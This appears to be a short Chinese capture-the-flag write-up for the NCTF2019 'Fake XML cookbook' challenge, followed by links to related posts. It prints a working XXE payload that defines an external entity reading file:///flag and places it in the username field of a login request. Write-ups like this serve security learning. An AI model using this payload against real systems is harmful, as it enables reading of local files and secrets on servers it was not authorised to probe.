[NCTF2019]Fake XML cookbook1

打开题目

猜测可能为sql注入,或者绕过,思路查看源码,看有用信息

试输入发现只会返回用户名错误,根据提示XML相对XXE攻击

首先进行抓包,然后构造payload。

复制代码
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

直接就可以得到flag

相关推荐
李少兄10 天前
解决OSS存储桶未创建导致的XML错误
xml·开发语言·python
阳光开朗_大男孩儿11 天前
XML读取和设置例子
xml·java·数据库
悟能不能悟12 天前
在 MyBatis 的xml中,什么时候大于号和小于号可以不用转义
xml·java·mybatis
慌糖12 天前
XML重复查询一条Sql语句??怎么解决
xml·数据库·sql
胖大和尚13 天前
在 XML 节点名称前添加前缀
xml
casual_clover14 天前
Android 中 解析 XML 字符串的几种方式
android·xml
SuperherRo14 天前
Web攻防-XSS跨站&文件类型&功能逻辑&SVG&PDF&SWF&HTML&XML&PMessage&LocalStorage
xml·pdf·html·svg·localstorage·swf·pmessage
'tubug'15 天前
XXE(XML外部实体注入)详解
xml·web安全
不太厉害的程序员19 天前
NC65配置xml找不到Bean
xml·java·后端·eclipse
峥嵘life20 天前
Android xml的Preference设置visibility=“gone“ 无效分析解决
android·xml